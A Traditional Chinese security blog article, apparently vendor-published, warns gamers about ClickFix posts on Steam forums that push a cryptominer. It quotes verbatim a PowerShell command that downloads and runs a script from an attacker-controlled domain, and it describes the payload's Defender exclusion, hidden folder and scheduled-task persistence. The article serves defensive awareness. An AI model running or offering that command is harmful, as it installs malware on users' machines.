
今年 ClickFix 攻擊真的可以說是大爆發。這種攻擊手法實在太受駭客歡迎,我們才剛寫完一種變形手法,沒多久又有新的版本冒出來。
這次駭客把目標鎖定在遊戲玩家身上。有科技媒體發現,Steam 論壇上開始出現一些看似在教玩家解決問題、實際上卻暗藏惡意指令的貼文。接下來就來看看這些貼文長什麼樣、會散播哪些惡意程式,以及玩家該怎麼保護自己的裝置。
ClickFix 攻擊也入侵 Steam 論壇
很多玩家遇到問題時,都會到 Steam 論壇向其他玩家求助。像是某個任務怎麼過、怎麼快速升級、哪裡可以拿到好裝備,或是遊戲遇到 Bug 該怎麼解決等等。
而駭客看中的,正是玩家對社群經驗分享的信任。
這類攻擊通常是這樣開始的:當有人在論壇上詢問遊戲閃退、道具突然不見,或其他技術問題時,駭客就會跑來留言,假裝自己是熱心幫忙的玩家。
接著,他們會叫你用系統管理員身分開啟 PowerShell,再貼上一段指令執行,聲稱這樣就能解決你遇到的遊戲問題。
但實際上,這段看似「修復問題」的指令,很可能才是真正的陷阱。

駭客把貼文包裝成「疑難排解教學」,建議使用者以系統管理員身分開啟 PowerShell,然後執行一段號稱可以解決問題的指令。
但你大概也猜得到,執行這段指令後,問題根本不會被修好,反而會惹出更多麻煩。
這其實就是 ClickFix 的核心手法:利用社交工程誘導受害者自己做出危險操作,讓詐騙者不必親自動手,就能一步步入侵你的裝置。
我們之前也介紹過其他 ClickFix 的攻擊手法,像是假的 CAPTCHA 驗證、假的瀏覽器錯誤訊息等等。這些招數都有一個共同點,就是想辦法騙你自己執行惡意指令。
而把 ClickFix 搬到 Steam 論壇上,更麻煩的地方在於,受害者可能不只是一開始發文求助的那位玩家。
其他玩家如果剛好遇到一樣的問題,透過 Google 搜尋找到這篇「解決方法」,也可能照著操作,結果一起中招。
簡單科普:irm | iex 指令到底在做什麼?
在介紹駭客到底想偷偷幫玩家裝什麼東西之前,我們先稍微講一下背後的技術原理。
Steam 論壇上的惡意貼文,會叫毫無戒心的玩家在 PowerShell 執行下面這段指令:
irm msfconfig.icu | iex
如果你平常不熟 PowerShell,第一眼看到這串指令,可能會覺得好像沒什麼問題。
甚至可能會誤以為它是在啟動 Windows 內建的 MSConfig 系統設定工具,只是後面多加了一些參數而已。
但實際上,這段指令一點都不單純。
我們把它拆開來看,就知道每個部分到底在做什麼:
- irm
這是 PowerShell 內建指令 Invoke-RestMethod 的縮寫。它會連線到後面指定的網址,並從那裡取得資料。 - icu
這其實是網址的一部分,並不是乍看之下像是電腦裡的某個本機檔案。這個網址連到的是駭客控制的伺服器,當 irm 發出請求後,伺服器就會回傳一段惡意 PowerShell 腳本。 - iex
這是另一個 PowerShell 內建指令 Invoke-Expression 的縮寫。它會把 irm 從網站抓回來的內容,直接當成 PowerShell 程式碼執行。
簡單來說,只要執行這一行 PowerShell 指令,電腦就會從指定網站下載一段腳本,然後立刻執行。
有 Reddit 網友也提到,如果只是想知道這段指令到底會下載什麼內容,又不希望它真的執行,可以把後面的 iex 刪掉。
少了 iex 之後,PowerShell 只會把腳本內容下載下來並顯示在視窗中,不會直接執行。這樣就能看到對方到底想叫你的電腦跑什麼程式碼。
接下來就來看看,這些看似「熱心幫忙」的 Steam 論壇網友,實際上到底想偷偷在玩家電腦裡安裝什麼。
不是最佳化工具,而是挖礦程式
不得不說,這群駭客確實有做功課。
從他們伺服器下載下來的 PowerShell 腳本,會把自己偽裝得很像一套正規的 Windows 系統最佳化工具。
執行之後,畫面會陸續跳出各種通知,讓使用者以為程式正在幫電腦進行一連串維護工作,包括:
- 清除暫存檔
- 清除 DNS 快取
- 更新驅動程式
- 檢查硬碟錯誤
- 停用不必要的開機啟動程式
- 掃描系統是否有惡意程式
- 修復 Windows 系統映像
- 檢查系統檔案是否完整
乍看之下,就像真的在幫你「修電腦、提升效能」,但背後真正做的事情,完全不是這麼回事。

這段腳本會不斷跳出各種「系統最佳化」的訊息,假裝自己正在進行有用的電腦維護工作,讓使用者以為一切都很正常。
但真正的惡意行為,其實都在背景偷偷進行。
首先,腳本會先確認自己是不是以系統管理員權限執行。如果是,它就會在:
C:\Windows\Background
建立一個隱藏的工作資料夾,接著把這個資料夾加入 Microsoft Defender 的排除清單。
從這一刻開始,只要檔案被放進這個資料夾,Windows 內建的防毒功能就不會再對它們進行掃描。
接下來,腳本會先替下一階段的攻擊做好準備,然後從駭客的伺服器下載一個執行檔,同樣存進:
C:\Windows\Background
而且還故意取了一個看起來很正常的名稱:
system.exe
這個下載下來的檔案其實是 XMRig,它是目前相當熱門的 Monero(門羅幣)挖礦工具之一。
要注意的是,XMRig 本身並不是惡意程式,而是一套合法的開源挖礦工具。真正的問題在於,駭客會在受害者完全不知情的情況下,把它偷偷裝進電腦。
一旦 XMRig 開始執行,你電腦的運算資源就會被拿去挖 Monero,而挖到的加密貨幣,當然不是進你的口袋,而是全部流進駭客的錢包。
這也是為什麼電競電腦特別容易成為駭客眼中的肥羊。
現在的 Gaming PC 通常都配有高效能 CPU 和 GPU,而這些強大的硬體效能,剛好非常適合拿來挖加密貨幣。
為了讓挖礦程式在電腦重新開機之後還能繼續運作,腳本還會在 Windows 的**工作排程器(Task Scheduler)**裡建立一個新的排程工作:
XMRig-{電腦名稱}
從此之後,只要 Windows 一開機,這個挖礦程式就會跟著自動啟動。
如何防範挖礦程式和其他惡意軟體?
比較麻煩的是,不少玩家不太願意在電腦上安裝資安軟體,甚至玩遊戲時會刻意把防毒關掉。
其中一個主要原因,就是一直有人認為:「開著防毒會拖慢遊戲效能。」
我們之前也曾分享過相關測試,結果顯示,玩遊戲時開著防毒軟體,並不會造成明顯的效能影響。
但挖礦程式就完全不一樣了。
它不只真的會吃掉大量系統資源、拖慢遊戲效能,長時間高負載運作,還可能讓硬體更快耗損。
所以,要怎麼保護自己的電競電腦和遊戲帳號?可以注意以下幾點:
- 不要隨便執行陌生人叫你複製貼上的 PowerShell、Terminal 或其他命令列指令。 不管是在論壇、聊天室還是留言區看到的,都不要因為對方說「這樣就能修好」就直接照做。
- 遇到自己看不懂的指令,按下 Enter 前先查清楚。 至少先弄懂這段指令到底會做什麼,以及執行後可能帶來哪些風險。
- 使用可靠、具備遊戲模式的資安防護軟體。 如果遇到惡意程式下載或執行,防護軟體可以及時偵測並攔截。
- 玩遊戲時不要把防毒關掉。 比較好的做法是選擇有「遊戲模式」的防護軟體。像 Kaspersky 的資安產品,在偵測到遊戲啟動後,就會自動切換到遊戲模式,暫時延後病毒資料庫更新、通知以及排程磁碟掃描,等你玩完遊戲後再進行,盡量避免影響遊戲體驗。